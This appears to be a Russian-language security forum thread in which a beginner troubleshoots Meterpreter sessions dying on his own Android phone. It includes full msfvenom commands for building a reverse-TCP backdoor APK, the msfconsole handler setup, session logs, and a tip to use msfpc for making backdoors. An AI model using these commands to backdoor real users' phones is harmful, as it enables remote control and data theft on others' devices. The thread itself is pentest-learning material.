• B правой части каждого сообщения есть стрелки и . Не стесняйтесь оценивать ответы. Чтобы автору вопроса закрыть свой тикет, надо выбрать лучший ответ. Просто нажмите значок в правой части сообщения.

Открытие и закрытие сесий Meterpreter

S

snaik

Доброго времени суток, я новичек в плане метасплоита но все же пытаюсь взломать свой смартфон, и так почитал гайды по написанию эксплоита. Все сделал правильно запустил msfconsole далее последовали такие команды из мануал предоставленого на форуме
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST 10.10.0.6
set LPORT 4444
exploit
Дальше захожу на телефон устанавливаю эксплоит запускаю и вижу вот таку вот картину

[*] Sending stage (72699 bytes) to 10.10.0.3
[*] 10.10.0.3 - Meterpreter session 5 closed. Reason: Died
[*] Meterpreter session 6 opened (10.10.0.6:4444 -> 10.10.0.3:33682) at 2019-09-19 02:31:46 +0300
[*] Sending stage (72699 bytes) to 10.10.0.3
[*] 10.10.0.3 - Meterpreter session 6 closed. Reason: Died
[*] Meterpreter session 7 opened (10.10.0.6:4444 -> 10.10.0.3:33684) at 2019-09-19 02:31:56 +0300
[*] 10.10.0.3 - Meterpreter session 7 closed. Reason: Died
[*] Sending stage (72699 bytes) to 10.10.0.3
[*] Meterpreter session 8 opened (10.10.0.6:4444 -> 10.10.0.3:33686) at 2019-09-19 02:32:02 +0300
[*] 10.10.0.3 - Meterpreter session 8 closed. Reason: Died

вывод с терминала

Не где не могу нагуглить почему он открывает сесию и потом ее закрывает?
 

Pulsera

Green Team
20.11.2016
181
28
BIT
10
Нет, проблему я нашел, и проблема не в сети, проблема в полезной нагрузке как я понял чуть позже выложу решение
Хорошо. Как помню у меня бывали такие случаи, только это было связано с windows и смена payload решила эту проблему
 
S

snaik

И так добрался до компа так вот в чем заключалась моя проблема это моя невнимательность.

в одном гайде изначально создавал apk файл таким образом
msfvenom -p android/meterpreter_reverse_tcp LHOST=10.10.0.6 LPORT=4444 R > avanger.apk

но как запускать полезную нагрузку я посмотрел другой гайд и там было
set payload android/meterpreter/reverse_tcp

и вот в чем разница, изначально не особо заметно но в msfconsole есть 2 пути к этому эксплоиту.
Так что можно считать тема закрыта проблема решена...
 

Pulsera

Green Team
20.11.2016
181
28
BIT
10
И так добрался до компа так вот в чем заключалась моя проблема это моя невнимательность.

в одном гайде изначально создавал apk файл таким образом
msfvenom -p android/meterpreter_reverse_tcp LHOST=10.10.0.6 LPORT=4444 R > avanger.apk

но как запускать полезную нагрузку я посмотрел другой гайд и там было
set payload android/meterpreter/reverse_tcp

и вот в чем разница, изначально не особо заметно но в msfconsole есть 2 пути к этому эксплоиту.
Так что можно считать тема закрыта проблема решена...
Ну это хорошо, бывает. Кстати, можешь познакомится с командой msfpc, тоже создает бэкдоры и он весьма прост в использований. Так что, советую познакомится с ним).
 
S

snaik

Ну это хорошо, бывает. Кстати, можешь познакомится с командой msfpc, тоже создает бэкдоры и он весьма прост в использований. Так что, советую познакомится с ним).
Спасибо большое, обязательно познакомлюсь, только начал путь пентестера)
 

Pulsera

Green Team
20.11.2016
181
28
BIT
10
Спасибо большое, обязательно познакомлюсь, только начал путь пентестера)
Похвально, путь будет интересным). Тебе случаем курс по metasploit не нужен? курс хоть и 2015 года, но познакомит с metasploit хорошо, сам после курса узнал много нового про него).
 
S

snaik

Похвально, путь будет интересным). Тебе случаем курс по metasploit не нужен? курс хоть и 2015 года, но познакомит с metasploit хорошо, сам после курса узнал много нового про него).
Конечно было бы заемчательно, это бы ускорило мое изучение)
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!